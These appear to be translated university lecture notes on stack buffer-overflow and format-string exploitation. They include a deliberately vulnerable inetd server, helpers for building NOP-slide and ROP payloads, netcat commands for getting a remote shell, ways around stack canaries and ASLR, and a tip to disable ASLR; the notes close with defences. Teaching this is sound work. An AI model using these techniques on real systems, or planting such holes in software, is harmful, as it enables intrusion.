===================
Class 11: Exploit
===================

Date: 13.05.2025


Additional materials
=====================

.. a: - :ref:`08-assignment` -- This got lost somewhere in the repo!

- :download:`exploit-x86_64.tar.bz2`


Program stack
=============

Every process has a stack, provided by the operating system. It is
nothing more than a mapped, contiguous segment of the process's address space
together with a stack pointer register (called SP in this scenario).
Local variables, return addresses of currently executing functions, and
partial results of calculations are stored on the stack.
The two basic operations are trivial to implement:

- putting data onto the stack means writing to the memory pointed to by the
  SP register and adjusting this register by the size of the written data
- taking data from the stack means reading the memory pointed to by SP and
  adjusting SP by the size of the data being taken
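
The two operations can be sketched as a toy model. This is only an illustration: the ``Stack`` class is hypothetical, and it assumes 8-byte words and a stack that grows towards lower addresses.

```python
import struct


class Stack:
    """Toy model of a downward-growing stack backed by a byte array."""

    def __init__(self, size=64):
        self.mem = bytearray(size)
        self.sp = size  # empty stack: SP sits just past the highest address

    def push(self, value):
        # Pushing moves SP down by the word size, then stores the value there.
        self.sp -= 8
        struct.pack_into("<Q", self.mem, self.sp, value)

    def pop(self):
        # Popping reads the word SP points to, then moves SP back up.
        (value,) = struct.unpack_from("<Q", self.mem, self.sp)
        self.sp += 8
        return value


stack = Stack()
stack.push(0x1111)
stack.push(0x2222)
print(hex(stack.pop()), hex(stack.pop()))
```

The values come back in the reverse order of the pushes, and the data is never erased: popping only moves SP.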


The operating system initially maps a small, predetermined amount of memory
for each program's stack (around 2 pages) and allocates further memory pages
only when needed.

i386
----

For the purposes of this scenario, we will focus on x86 architectures:

- SP points to the byte at the top of the stack
- the stack grows downwards, meaning putting data onto the stack decreases SP
- on Linux and BSD, the function caller should (in the classic case, more in [1]):

  - save the contents of registers other than BP, SI, DI, BX (if it wants
    to use them later)
  - put arguments onto the stack in reverse order of their declaration
  - jump to the body of the called function, putting the current location in the
    program code onto the stack (the return address)
  - after the called function returns, remove the arguments from the stack (the
    result is in AX)

- the called function should:

  - save registers BP, SI, DI, BX if it intends to change them
  - optionally set the BP register to the content of SP (needed to obtain
    stack-traces, simplifies assembler code, but is not mandatory; in
    gcc, generating such code can be disabled with the
    ``-fomit-frame-pointer`` flag)
  - reserve space on the stack for local variables (by shifting SP)
  - execute its body
  - restore registers
  - put the result into AX
  - jump to the address from the top of the stack - the return address, the one
    placed by the caller
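
The resulting frame can be sketched as a table of offsets from the frame pointer. This is a simplified model: the function name is hypothetical, and it assumes 4-byte arguments, a saved frame pointer, and locals placed in declaration order with no padding, which real compilers do not guarantee.

```python
def i386_frame_layout(arg_names, local_sizes):
    """Return {name: offset from EBP} for a classic i386 frame.

    Assumes 4-byte arguments, a saved frame pointer, and locals laid out
    in declaration order with no padding; real compilers may differ.
    """
    layout = {"saved EBP": 0, "return address": 4}
    # Arguments were pushed in reverse order, so the first one ends up
    # at the lowest address, right above the return address.
    for index, name in enumerate(arg_names):
        layout[name] = 8 + 4 * index
    offset = 0
    for name, size in local_sizes:
        offset -= size  # locals live below the saved frame pointer
        layout[name] = offset
    return layout


for name, offset in i386_frame_layout(["a", "b"], [("buf", 128)]).items():
    print(f"{name:15} EBP{offset:+d}")
```

In this model, a write that starts at ``buf`` and runs 132 bytes upwards reaches the return address.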

x86_64
------

In the x86_64 architecture, function calls look very similar, with the
difference that the first 6 arguments are passed through registers RDI, RSI,
RDX, RCX, R8, R9 (or XMM0-7 for floating-point types, respectively).
If a function has more arguments, they are passed via the stack - just like in
i386.
Of course, all addresses are 8 bytes.
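
As a rough illustration, the assignment of arguments to registers can be modelled as below. The function and the ``stack+N`` labels are hypothetical, and the model only distinguishes integer and floating-point arguments; structures and variadic functions are ignored.

```python
INT_REGS = ["RDI", "RSI", "RDX", "RCX", "R8", "R9"]
FLOAT_REGS = [f"XMM{i}" for i in range(8)]


def assign_arguments(kinds):
    """Map each argument kind ("int" or "float") to a register or the stack."""
    int_free = list(INT_REGS)
    float_free = list(FLOAT_REGS)
    stack_slot = 0
    places = []
    for kind in kinds:
        free = float_free if kind == "float" else int_free
        if free:
            places.append(free.pop(0))
        else:
            # Out of registers of this class: the argument goes on the stack.
            places.append(f"stack+{8 * stack_slot}")
            stack_slot += 1
    return places


print(assign_arguments(["int"] * 7 + ["float"]))
```

The seventh integer argument lands on the stack, while the floating-point argument that follows it still gets ``XMM0``, because the two register classes are counted separately.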

Disadvantages and advantages of the stack
------------------------------------------

As can be seen from this scenario, allocating local variables is very fast,
because it boils down to modifying one register, and as long as local variables
are multiples of the processor's word size, there is no fragmentation problem.
These two features give stack allocation a significant advantage over
heap allocation - malloc needs complex memory management logic and it is
difficult to avoid fragmentation. Nevertheless, the stack is not suitable for
holding variables whose lifespan exceeds a single function call.
Another feature of the stack is the ease of predicting the arrangement of
program data on it and, in the case of a poorly written program, using this
knowledge to take control of the program.

Buffer overflow
===============

This term refers to a situation where, for some reason, the program "forgets"
the actual size of a buffer and exceeds its boundaries, accessing memory
that does not belong to it.
Example::

   char c[5];
   strcpy(c, "12345");

``strcpy()`` copies a string, along with the terminating null byte, to the
buffer passed as the first argument, so in this case it writes 6 bytes into a
5-element buffer.
The language specification leaves the result undefined, but compilers behave
predictably, and it is easy to guess how variables are arranged relative to each
other on the stack (usually sequentially).
This predictability makes one particular kind of buffer overflow, the stack
buffer overflow, easy to exploit: by writing far enough past the end of the
buffer, one can overwrite the function's return address.
If done skillfully, this gives control of the program, because the ``ret``
instruction in the attacked program's code will jump to whatever location is
stored as the return address.
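
The effect can be simulated on a byte array. This is a sketch under simplifying assumptions: the frame layout (a 5-byte buffer directly followed by an 8-byte return address) and the address ``0x400123`` are made up, and ``unsafe_strcpy`` is a hypothetical stand-in for the C function.

```python
import struct


def unsafe_strcpy(memory, dest, source):
    """Copy source plus a terminating NUL without any bounds check."""
    data = source + b"\x00"
    memory[dest:dest + len(data)] = data


# Hypothetical frame: a 5-byte buffer directly followed by an 8-byte
# return address (no padding, no saved registers).
frame = bytearray(5) + bytearray(struct.pack("<Q", 0x400123))

unsafe_strcpy(frame, 0, b"12345")
(return_address,) = struct.unpack_from("<Q", frame, 5)
print(hex(return_address))
```

Even this one-byte overflow changes the stored address: the terminating NUL replaces its lowest byte. A longer input would replace the whole address.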

inetd
-----

``inetd`` is a standard Unix daemon, a so-called superserver. In the
``inetd.conf`` configuration file, programs are assigned to various network
services, e.g.,
proftpd to the ftp service. ``inetd`` listens on the appropriate
ports and upon establishing a connection, it starts the program appropriate for
the service with descriptors 0 and 1 set so that the program sends data over the
network by writing to standard output and reads data by reading from standard
input.
This approach used to be much more popular than it is today,
although this daemon is still common.
A newer version of the daemon is called
``xinetd`` and differs mainly in the configuration method - instead of one
common ``inetd.conf`` file, each service has a separate file in the
``xinetd.d`` directory.
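
From the service's point of view, this means it needs no networking code at all. A minimal sketch of such a service follows; the ``serve`` function is hypothetical and is exercised here with in-memory streams instead of a real connection.

```python
import io


def serve(stdin, stdout):
    """Echo each received line back in upper case, inetd-style."""
    for line in stdin:
        stdout.write(line.upper())
        stdout.flush()  # the peer only sees data once it is flushed


# Under inetd one would call serve(sys.stdin, sys.stdout), because
# descriptors 0 and 1 are then the network connection.
demo_in = io.StringIO("hello\n")
demo_out = io.StringIO()
serve(demo_in, demo_out)
print(demo_out.getvalue(), end="")
```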

Writing an exploit
-------------------

An exploit is the colloquial name for a program that exploits a vulnerability
in another program.
If we can track down a flaw that allows writing arbitrarily far past the end
of a buffer, we can overwrite the return address in such a way
that the program does what the attacker wants.
For simplicity, let's assume we are dealing with the following code (``server.c``)::

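    #include <stdio.h>

    int test()
    {
        char buf[128];
        /* Deliberately unsafe: %s has no width limit, so input longer
           than 127 bytes overflows buf. */
        if (scanf("%s", buf) == EOF)
            return 0;
        /* Deliberately unsafe: user input is used as the format string. */
        printf(buf);
        return 1;
    }

    int main()
    {
        while (test()) {
            fflush(stdout);
        }
        return 0;
    }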

We assume that this code is run via ``inetd``. Our goal is to gain everything
that the user the program runs as can access.
A sketch of what we will write:

- we will send code to be executed (the so-called payload)
- in addition to the payload, we will send data crafted so that, instead of
  returning from the ``test()`` function, the program executes the payload

Problems:

- check how much garbage needs to be inserted before the fake return address in
  the malicious message to hit the right spot on the stack
- find out what to overwrite the return address with to jump to the payload
- write a payload that does something sensible

Finding out where the return address is, having the source code, is easy -
just count, keeping in mind how function calls look on x86.
Without the source code, one can dump memory (the stack) and, starting from
the end of the stack (which is known, because the SP register is known), look
for 4- or 8-byte aligned numbers that point to the memory area where the
program code is mapped.
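
The search through a stack dump can be sketched as follows. The function name, the dump contents, and all addresses are made up for illustration, and the dump is assumed to start at an aligned address.

```python
import struct


def find_code_pointers(dump, dump_address, code_start, code_end, word=8):
    """Yield (stack address, value) for aligned words that point into code."""
    fmt = "<Q" if word == 8 else "<I"
    for offset in range(0, len(dump) - word + 1, word):
        (value,) = struct.unpack_from(fmt, dump, offset)
        if code_start <= value < code_end:
            yield dump_address + offset, value


# Hypothetical dump: two data words followed by a saved return address.
dump = struct.pack("<QQQ", 0x4141414141414141, 0x7FFC00001000, 0x4006F2)
for address, value in find_code_pointers(dump, 0x7FFC00000F00, 0x400000, 0x401000):
    print(hex(address), "->", hex(value))
```

Each hit is only a candidate: a stale value left over from an earlier call can also point into the code, so the result still has to be checked against the disassembly.
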
A bigger problem is finding out where to jump, because:

- the stack address is assigned by the operating system
- at first glance, it is not clear what is on the stack below the ``main``
  function
- even if, by reading the libc and kernel code, we find out what and how much
  is on the stack below the ``main`` function, it will turn out that the amount
  is not constant, because it depends, for example, on:

  - the size of arguments passed to the program
  - the environment

Fortunately, many systems always place the start of the stack at the same
address, close to the end of the process's virtual address space, so the
position of this buffer cannot fluctuate much - it depends mainly on the
environment and program arguments.
Hence, the fluctuations in the buffer address can be reasonably estimated -
just run the program with an empty environment in the / directory, without
arguments, and check the address of any local variable.
In a real run, the environment and arguments can only add to what lies on the
stack below the ``main`` function, so this measurement gives one bound.
As the second bound, we should accept some reasonable limit on the size of the
environment and arguments.
For simplicity, for now, we ignore the fact that on most systems the stack
address is nowadays randomized (within a certain range).
If we then arrange the stack as follows:

=============================== ====================
Before attack                   After attack
=============================== ====================
?                               payload
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
return address                  malicious return address
------------------------------- --------------------
optionally saved registers      garbage
------------------------------- --------------------
buffer                          garbage
=============================== ====================

(NOP stands for an instruction that does nothing)

then it is enough for the malicious return address to point to any of the NOP
instructions.
If there are enough of them, we can thus absorb the fluctuations in the
buffer address.
This technique, which involves inserting a large number of NOPs into the
buffer, is called a NOP-slide, because figuratively speaking, we slide down the
NOPs to the payload.
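
Assembling such a message can be sketched as below. Everything concrete here is a placeholder rather than a value measured on a real target: the offset, the return address, the slide length, and the payload bytes. The ``build_message`` helper is hypothetical and is not the code from ``exploit.py``.

```python
import struct

NOP = b"\x90"  # single-byte x86 no-op
WHITESPACE = b" \t\n\v\f\r"  # bytes at which scanf("%s") stops reading


def build_message(offset, return_address, slide_length, payload):
    """Lay out garbage, the fake return address, the NOP slide and the payload."""
    message = b"A" * offset
    message += struct.pack("<Q", return_address)
    message += NOP * slide_length
    message += payload
    if any(byte in WHITESPACE for byte in message):
        raise ValueError("message contains a byte that scanf would stop at")
    return message


# All numbers below are placeholders, not values measured on a real target.
placeholder_payload = b"\xcc" * 4  # stands in for real machine code
message = build_message(136, 0x7FFC12345678, 64, placeholder_payload)
print(len(message))
```

The whitespace check is there because the server reads its input with ``scanf("%s")``, which would cut the message short at the first whitespace byte.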

Technical details
-----------------

Tools:

- ``objdump``: disassembles compiled programs - useful for analysis,
  especially with the ``-d`` flag
- ``ulimit``: shell builtin that manages user limits - needed here only to ask
  the kernel to write memory dumps (core dumps) when the program crashes
  (``-c`` flag), which is useful in debugging
- ``gdb``: debugger that can also load a memory dump
- ``gcc``: compiles programs, including the payload
- ``/proc/self/maps``: on Linux, this file shows the memory mappings of the
  process, which lets you see where the stack starts
- ``netcat`` (``nc``): used to send the exploit over the network
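
Reading the stack location out of the mappings file can be sketched as follows. The helper names and the sample text are made up; on a real Linux system the text would come from ``/proc/self/maps``.

```python
def parse_maps_line(line):
    """Split one /proc/<pid>/maps line into (start, end, perms, name)."""
    fields = line.split()
    start, end = (int(part, 16) for part in fields[0].split("-"))
    name = fields[5] if len(fields) > 5 else ""
    return start, end, fields[1], name


def find_stack(maps_text):
    """Return (start, end, perms) of the [stack] mapping, or None."""
    for line in maps_text.splitlines():
        if not line.strip():
            continue
        start, end, perms, name = parse_maps_line(line)
        if name == "[stack]":
            return start, end, perms
    return None


# Made-up sample in the format used by Linux; on a real system pass
# open("/proc/self/maps").read() instead.
sample = (
    "00400000-00401000 r-xp 00000000 08:01 131 /root/server\n"
    "7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]\n"
)
print(find_stack(sample))
```

The permissions field is worth a look as well: ``rw-p`` without ``x`` means the stack is not executable.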


Step-by-step implementation
---------------------------

The simplest and most effective payload will be launching a shell,
i.e., executing ``execve``. Since the launched program inherits descriptors,
and the program launched in inetd uses descriptors 0, 1, and 2 for network
communication, calling ``execve`` will achieve an effect similar to a remote
shell.
Since it is not clear where the PLT is located (because it depends on the
compiler and very minor code changes) and even less clear where the libc
library code is mapped, it is better to call syscalls manually - bypassing
the wrappers provided by the standard library.
Details were discussed in the second class.

Knowing how to execute a syscall, one should write a program in assembly
that will execute ``execve`` on ``/bin/sh``.
An example is in the ``payload.s`` file.

The executable code of this program will be our payload.
Running ``make show-payload`` prints this code in a format suitable for pasting
into C source.

The ``demo.c`` file shows how to directly transfer control to this code
(``brute_force`` function) and how to overwrite the return address with the
payload address.
The address used there is solely a result of calculating what is on the stack
according to the calling convention given at the beginning.
At this stage, we assume that the payload will be placed in executable memory.
In the following part, we will discuss how to bypass this limitation.
The last step is to deliver the payload to the program from outside, along with
the malicious return address and the NOP-slide.
The position of the address in the buffer follows directly from the ``demo.c``
example. The address itself, however, was determined experimentally by checking
the address of a local variable in the ``main()`` function.
This can be seen in the ``exploit.py`` file. After sending the malicious data,
we need some way to send commands; this can be done as follows::

    (./exploit.py; cat) | ./server

Network attack
---------------

To achieve the same effect over the network (``inetd``), you need to experiment
a bit with the buffer size (the size of the NOP-slide) and the address to jump
to.
Then it is enough to use netcat (the ``nc`` command) to interact with the
remotely running server, which will then turn into a shell.
To do this, run::

    nc -c "./exploit.py;socat STDIO OPEN:/dev/tty"  server_address port

If everything goes well, the result will be exploiting the vulnerability of a
20-line program to take control of a remote computer.

Non-executable stack (NX)
-------------------------

One of the mechanisms that is supposed to make these types of attacks more
difficult is marking which memory pages cannot be executed (NX flag).
In particular, the stack normally does not contain program code, so it can be
marked as such.
However, this does not prevent the attack, it only makes it a little more
difficult - we cannot jump directly to the sent payload, but we can use
everything that is already loaded in memory and marked as executable - in
particular, the standard library (directly or via PLT).
On the i386 architecture, one can simply prepare a jump to e.g.,
the ``system()`` function from libc at the return address location and place
arguments a bit further.
Here, the address of the string ``/bin/sh`` or another equally useful string
is needed.
Since the exact stack address is not known, one cannot (directly) provide
this string oneself.
But a moment of searching will show that the necessary string is in the
standard library::

    $ xxd /lib64/libc.so.6|grep -A 1 /bin
    01841a0: 6974 7900 6e61 6e00 2d63 002f 6269 6e2f  ity.nan.-c./bin/
    01841b0: 7368 0065 7869 7420 3000 4d53 4756 4552  sh.exit 0.MSGVER
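
The same search can be done programmatically. The sketch below re-enters the two dump lines above as bytes, with ``find_string`` as a hypothetical helper; on a real system the whole library file would be read instead.

```python
def find_string(blob, needle, blob_offset=0):
    """Return the file offset of a NUL-terminated needle, or None."""
    index = blob.find(needle + b"\x00")
    return None if index < 0 else blob_offset + index


# The two dump lines above, re-entered as bytes; they start at 0x1841a0.
# On a real system use open("/lib64/libc.so.6", "rb").read() with offset 0.
chunk = bytes.fromhex(
    "697479006e616e002d63002f62696e2f"
    "736800657869742030004d5347564552"
)
print(hex(find_string(chunk, b"/bin/sh", 0x1841A0)))
```

This is an offset within the file, not an address: to use it, the address at which the library is mapped in the target process still has to be added.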

In the case of the x86_64 architecture, it is a bit more complicated because
the initial parameters are passed through registers.
But again, using what is already executable in memory, one can search for
instruction sequences that load data from the stack into registers.
This technique is known as return-oriented programming (ROP), because the
instruction sequences being searched for (so-called gadgets) will most often
be of the form::

    pop ...
    ret

In this way, by placing gadget addresses and data alternately on the stack, we
can load the desired data.
Sometimes gadgets can be more complex, but to find the simplest ones, we can
prepare a source file with the sought instructions (``gadgets.s``), compile it,
and then search the process memory using the ``searchmem`` function from the
peda extension to GDB::

    $ objdump -d gadgets.o
    (...)
    0000000000000000 <main>:
       0:   5f                      pop    %rdi
       1:   c3                      retq
       2:   5e                      pop    %rsi
       3:   c3                      retq

    gdb-peda$ searchmem "\x5f\xc3"
    Searching for '_\xc3' in: None ranges
    Found 543 results, display max 256 items:
    server : 0x4007a3 (<__libc_csu_init+99>:    pop    rdi)
    server : 0x6007a3 --> 0x841f0f2e6666c35f
      libc : 0x7ffff7a3edd5 (<iconv+165>:   pop    rdi)
      libc : 0x7ffff7a3ee02 (<iconv+210>: pop    rdi)
    (...)
    gdb-peda$ searchmem "/bin/sh"
    Searching for '/bin/sh' in: None ranges
    Found 1 results, display max 1 items:
    libc : 0x7ffff7ba21ab --> 0x68732f6e69622f ('/bin/sh')

An example using this technique is in the ``exploit-rop.py`` file.
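
As an illustration only, and not the contents of ``exploit-rop.py``, the smallest chain of this kind could be packed as below. The gadget and string addresses are taken from the ``searchmem`` output above. The ``rop_chain`` helper is hypothetical, and the ``SYSTEM`` address is a placeholder that would have to be looked up in the target process.

```python
import struct


def rop_chain(pop_rdi_ret, argument, function):
    """Pack: gadget address, value to pop into RDI, function to return into."""
    return struct.pack("<QQQ", pop_rdi_ret, argument, function)


POP_RDI_RET = 0x4007A3        # from the searchmem output above
BIN_SH = 0x7FFFF7BA21AB       # from the searchmem output above
SYSTEM = 0x7FFFF7A60000       # placeholder: look up the real address in gdb

chain = rop_chain(POP_RDI_RET, BIN_SH, SYSTEM)
print(chain.hex())
```

The chain is written where the return address used to be: ``ret`` jumps to the gadget, ``pop`` loads the string address into RDI, and the gadget's own ``ret`` continues into the chosen function.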

Stack protector and address space randomization (ASLR)
-----------------------------------------------------------

GCC has the ``-fstack-protector`` option, which makes the compiler place a
"canary" on the stack at the start of each function it instruments. The canary
is a predetermined number that is checked before the function returns to see
if it has been changed.
However, if there is a bug in the program that allows a memory segment containing
the "canary" to leak, this mechanism becomes useless.
It so happens that the test program ``server.c`` contains such a bug - whoever
controls the format string passed to ``printf()`` can print any memory segment.
An example is in ``exploit-rop-stack-protector.py``.
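
The leak itself can be as simple as asking ``printf()`` for one of its numbered arguments. The sketch below uses hypothetical helper names and is not taken from the exploit file: the argument index and the sample reply are made up, and ``lx`` assumes a 64-bit target.

```python
def leak_request(index):
    """Format string that prints the index-th printf argument as hex."""
    return f"%{index}$lx".encode()


def parse_leak(reply):
    """Turn the hex digits echoed by the server into an integer."""
    return int(reply.decode(), 16)


# Hypothetical: which index holds the canary depends on the compiled binary.
print(leak_request(23))
print(hex(parse_leak(b"5a1c3f9e7b2d4400")))
```

The request contains no whitespace, so ``scanf("%s")`` in the server reads it as a single token.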

Another mechanism that makes attacks more difficult is address space
randomization (ASLR).
It makes it harder to know the addresses to which one could conveniently jump.
And again, a bug that allows a memory segment to be read is enough to bypass
this mechanism - having any address from the process's address space,
one can check what should be there and calculate the remaining addresses based
on that.
An example is in
``exploit-rop-stack-protector-aslr.py``.
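
The calculation is plain arithmetic, sketched below with hypothetical helper names. The numbers come from the outputs shown earlier in this text, under two assumptions: both outputs describe the same libc build, and offsets in the file equal offsets in memory.

```python
def library_base(leaked_address, known_offset):
    """Base address of a mapping, given one leaked address inside it."""
    return leaked_address - known_offset


def rebase(base, offset):
    """Runtime address of anything whose offset in the file is known."""
    return base + offset


# Example with numbers from this text: "/bin/sh" sits at file offset
# 0x1841ab (dump line 0x1841a0, eleven bytes in) and was seen at
# 0x7ffff7ba21ab in the running process.
base = library_base(0x7FFFF7BA21AB, 0x1841AB)
print(hex(base))
print(hex(rebase(base, 0x1841A0)))
```

A base that comes out page-aligned is a useful sanity check that the leaked address and the offset really belong together.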

Format string
=============

Buffer overflows are not the only dangerous vulnerability.
As seen earlier, giving an attacker control over the format string for
``printf()`` greatly facilitates attacks.
But such a vulnerability can also be used on its own to take control of the
program.
Firstly, sensitive data (e.g., passwords) may be present in memory, and
secondly, the ``%n`` format allows modifying memory.
Exploiting this is made easier by the fact that the field width can be
taken from the printf parameters (e.g., ``%*d``), and that the number of the
parameter to use can be specified (e.g., ``%4$d`` or ``%*5$d``; combinations
are also possible: ``%4$*5$d``).
As a result, a primitive for copying data on the stack can be assembled from
this:

- read data by printing a field of appropriate width: ``%*15$d``
- then the number thus "read" can be written using ``%23$n``
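
The copy primitive can be illustrated with a deliberately tiny model of ``printf()``. It is a hypothetical simplification that understands only the two directives used above and counts characters instead of printing them. How the real library picks the value to print is not modelled; the value is just assumed to be narrower than the width.

```python
import re

TOKEN = re.compile(r"%\*(\d+)\$d|%(\d+)\$n")


def mini_printf(fmt, args, memory):
    """Model only %*N$d and %N$n; return the number of characters 'printed'.

    args holds plain integers; for %N$n the argument is used as a key
    into memory, standing in for a pointer.
    """
    printed = 0
    position = 0
    for match in TOKEN.finditer(fmt):
        printed += match.start() - position  # literal text before the token
        position = match.end()
        if match.group(1):
            # %*N$d: pad to the width stored in argument N (1-based).
            # The value itself is assumed to be narrower than the width.
            printed += args[int(match.group(1)) - 1]
        else:
            # %N$n: store the running count where argument N points.
            memory[args[int(match.group(2)) - 1]] = printed
    return printed + len(fmt) - position


memory = {"flag": 0}
args = [0] * 23
args[14] = 42        # argument 15: the number to copy
args[22] = "flag"    # argument 23: stands in for a pointer to the target
mini_printf("%*15$d%23$n", args, memory)
print(memory["flag"])
```

The number never appears in the format string itself: it travels from argument 15 into the character count and from there into the location named by argument 23.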

As long as interesting addresses are on the stack (or can be assembled using the
above), memory can in practice be modified arbitrarily.
An example program for experiments is in ``login.c``. It is a simple tool that
checks a password against a hardcoded hash and, if it matches, launches a shell.
It is intended to be installed with the SUID bit set.
Additionally, to be more user-friendly, it lets you provide your own password
prompt text.
The goal of the attack is, of course, to bypass the password check. To do this,
one must find, on the stack, the address of the variable that decides whether
the user is admitted, and then provide a parameter that overwrites this variable.

Moral
=====

The above examples show how dangerous careless programming is. Although this is
an example made for the purpose of a course, the mechanism is common and widely
used in practice.
Security reports from internet portals such as Secunia confirm this.

Can we defend against this in any way?
There are many methods; unfortunately, they only make the attackers' work more
difficult but do not prevent it:

- stack randomization (the start of the stack is in a different place in each
  process)
- randomization of the entire address space - including the mapping location
  of libraries and the program loading location
- NX bit (newer processors allow marking a segment of the virtual space (stack)
  as Non-eXecutable, which will cause an error when trying to execute the
  payload)
- gcc has the ``-fstack-protector`` option, which causes gcc, when starting the
  execution of each function, to place a "canary" on the stack, which is a
  predetermined number that is checked before exiting the function to see if it
  has been changed
- gcc and glibc have protection against format string attacks, activated by
  the compilation option ``-D_FORTIFY_SOURCE=2``
- resolving all relocations early and switching the entire GOT and PLT to
  read-only

A fairly good way to avoid memory management errors (including buffer overflows)
is to use languages that manage memory themselves, such as Java, Python, etc.
Of course, this will not protect against errors in the implementation of the
compiler or interpreter itself.

Tips
---------

- to disable address space randomization (including the stack), change the
  kernel setting::

      sysctl -w kernel.randomize_va_space=0

- to add an ftp-like server on port 21 to inetd, add the line::

      ftp     stream  tcp     nowait  root    /root/server

- for the ``xinetd`` version, analogous configuration will require
  ``/etc/xinetd.d/ftp``::

      service ftp
      {
          disable     = no
          id          = ftp
          wait        = no
          socket_type = stream
          user        = root
          group       = root
          server      = /root/server
          #server_args    =
      }

- when working with gdb, the "peda" extension (Python Exploit Development
  Assistance for GDB) is very useful - https://github.com/longld/peda

- in the payload, be careful with whitespace - ``scanf()`` will stop reading
  the rest of the characters at the first such character

.. Author: Marek Dopiera <dopiera (at) mimuw (dot) edu (dot) pl>
   Update 12.05.2015 Marek Marczykowski-Górecki <marmarek@mimuw.edu.pl>
   Translated by Gemini: 13.05.2025